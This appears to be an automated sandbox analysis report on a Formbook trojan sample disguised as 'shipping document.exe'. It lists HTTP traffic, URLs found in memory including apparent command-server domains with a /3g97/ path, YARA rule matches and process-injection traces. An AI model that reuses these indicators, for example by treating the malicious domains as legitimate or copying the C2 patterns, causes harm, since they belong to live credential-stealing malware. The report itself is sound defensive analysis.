              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 24 Apr 2024 05:28:06 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 24 Apr 2024 05:28:08 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 24 Apr 2024 05:28:11 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 196 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
              Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Length: 548 | Content-Type: text/html | Server: Pepyaka | X-Wix-Request-Id: 1713936497.4153491690962646761 | X-Content-Type-Options: nosniff | Accept-Ranges: bytes | Date: Wed, 24 Apr 2024 05:28:17 GMT | X-Served-By: cache-bur-kbur8200132-BUR | X-Cache: MISS | X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7CuzCCL+dj8TnMJldQo94o | Via: 1.1 google | glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Length: 548 | Content-Type: text/html | Server: Pepyaka | X-Wix-Request-Id: 1713936500.12634899652302646765 | X-Content-Type-Options: nosniff | Accept-Ranges: bytes | Date: Wed, 24 Apr 2024 05:28:20 GMT | X-Served-By: cache-bur-kbur8200098-BUR | X-Cache: MISS | X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7CuzCCL+dj8TnMJldQo94o | Via: 1.1 google | glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Length: 548 | Content-Type: text/html | Server: Pepyaka | X-Wix-Request-Id: 1713936502.82334837651244156285 | X-Content-Type-Options: nosniff | Accept-Ranges: bytes | Date: Wed, 24 Apr 2024 05:28:22 GMT | X-Served-By: cache-bur-kbur8200108-BUR | X-Cache: MISS | X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb6JxSuEU9PIuIbre7VUIJiy | Via: 1.1 google | glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=utf-8 | X-Wix-Request-Id: 1713936505.5353489358346334572 | Age: 0 | Server: Pepyaka | X-Content-Type-Options: nosniff | Accept-Ranges: bytes | Date: Wed, 24 Apr 2024 05:28:25 GMT | X-Served-By: cache-bur-kbur8200142-BUR | X-Cache: MISS | Vary: Accept-Encoding | Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_sea1_g | X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb690urzQo8znCIRFiqxF/nR,2d58ifebGbosy5xc+FRalsfKRjkvyVNx6F/MgVi8KAXjsEimH09mQSUzjf+MlEbWutsYt+BqfLnLyvHX+3ZU2A==,2UNV7KOq4oGjA5+PKsX47HqjR+6CNmn/ng3r7CWVjR4=,R8nVwPJv9QJL1m78OROO+IV9oD+TXFc2vEfvXLHbcEY=,znHLAI6vxugFKypFMbJjolwf8wWTJVQybTnH7MNlwkYSO5XmrrCSQNDehIjmfew3bNsG/ydVSs9vBX3FVb1aSQ== | Transfer-Encoding: chunked | Via: 1.1 google | glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= | Connection: close | Data Ascii: bf1 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" conten
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 24 Apr 2024 05:27:55 GMT | Server: Apache/2.2.15 (CentOS) | Content-Length: 289 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 24 Apr 2024 05:27:58 GMT | Server: Apache/2.2.15 (CentOS) | Content-Length: 289 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 24 Apr 2024 05:28:01 GMT | Server: Apache/2.2.15 (CentOS) | Content-Length: 289 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 24 Apr 2024 05:28:04 GMT | Server: Apache/2.2.15 (CentOS) | Content-Length: 289 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>
              Source: openfiles.exe, 00000007.00000002.4111642073.00000000054B6000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.00000000038B6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://a-two-spa-salon.com/3g97/?12l42=14Ldh71M1tAlq614
              Source: openfiles.exe, 00000007.00000002.4111642073.0000000006146000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000004546000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://browsehappy.com/
              Source: openfiles.exe, 00000007.00000002.4111642073.0000000005AFE000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000003EFE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://fedoraproject.org/
              Source: firefox.exe, 00000009.00000002.2317219344.0000000019494000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://hostname.domain.tld/
              Source: openfiles.exe, 00000007.00000002.4111642073.0000000005AFE000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000003EFE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://nginx.net/
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
              Source: shipping document.exe, 00000000.00000002.1681640369.0000000006410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com8
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: oWRaEnEJAq.exe, 00000008.00000002.4113195669.00000000057BE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tondex.finance
              Source: oWRaEnEJAq.exe, 00000008.00000002.4113195669.00000000057BE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tondex.finance/3g97/
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: shipping document.exeString found in binary or memory: https://github.com/Deathmax/Chest-Control/raw/master/version.txt
              Source: openfiles.exe, 00000007.00000002.4111642073.000000000646A000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4113701461.00000000078B0000.00000004.00000800.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: openfiles.exe, 00000007.00000003.2209406963.0000000007BA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: openfiles.exe, 00000007.00000002.4111642073.000000000646A000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4113701461.00000000078B0000.00000004.00000800.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=brothedboil.com
              Source: oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
              Source: oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000004090000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

              E-Banking Fraud

              Source: Yara match, File source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: initial sample, Static PE information: Filename: shipping document.exe
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01773D402_2_01773D40
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178FDC02_2_0178FDC0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01821D5A2_2_01821D5A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01827D732_2_01827D73
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E9C322_2_017E9C32
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182FCF22_2_0182FCF2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182FFB12_2_0182FFB1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182FF092_2_0182FF09
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01733FD22_2_01733FD2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01733FD52_2_01733FD5
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01771F922_2_01771F92
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01779EB02_2_01779EB0
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0E0266_2_03B0E026
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B048FA6_2_03B048FA
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0E0796_2_03B0E079
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B2D7896_2_03B2D789
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0FFF96_2_03B0FFF9
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B167336_2_03B16733
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B167796_2_03B16779
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0FDD06_2_03B0FDD0
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0FDD96_2_03B0FDD9
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0495E4F67_2_0495E4F6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049544207_2_04954420
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049624467_2_04962446
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049705917_2_04970591
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B05357_2_048B0535
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CC6E07_2_048CC6E0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048AC7C07_2_048AC7C0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048D47507_2_048D4750
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B07707_2_048B0770
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049420007_2_04942000
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049641A27_2_049641A2
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049701AA7_2_049701AA
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049681CC7_2_049681CC
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048A01007_2_048A0100
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0494A1187_2_0494A118
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049381587_2_04938158
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049302C07_2_049302C0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049502747_2_04950274
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049703E67_2_049703E6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048BE3F07_2_048BE3F0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496A3527_2_0496A352
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04950CB57_2_04950CB5
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048A0CF27_2_048A0CF2
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B0C007_2_048B0C00
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048C8DBF7_2_048C8DBF
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048AADE07_2_048AADE0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048BAD007_2_048BAD00
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0494CD1F7_2_0494CD1F
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496CE937_2_0496CE93
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048C2E907_2_048C2E90
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496EEDB7_2_0496EEDB
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496EE267_2_0496EE26
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B0E597_2_048B0E59
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0492EFA07_2_0492EFA0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048A2FC87_2_048A2FC8
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04952F307_2_04952F30
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048F2F287_2_048F2F28
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048D0F307_2_048D0F30
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04924F407_2_04924F40
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048968B87_2_048968B8
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048DE8F07_2_048DE8F0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048BA8407_2_048BA840
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B28407_2_048B2840
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B29A07_2_048B29A0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497A9A67_2_0497A9A6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048C69627_2_048C6962
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048AEA807_2_048AEA80
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04966BD77_2_04966BD7
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496AB407_2_0496AB40
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496F43F7_2_0496F43F
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048A14607_2_048A1460
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0494D5B07_2_0494D5B0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049795C37_2_049795C3
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049675717_2_04967571
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049616CC7_2_049616CC
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048F56307_2_048F5630
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496F7B07_2_0496F7B0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B70C07_2_048B70C0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0495F0CC7_2_0495F0CC
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496F0E07_2_0496F0E0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049670E97_2_049670E9
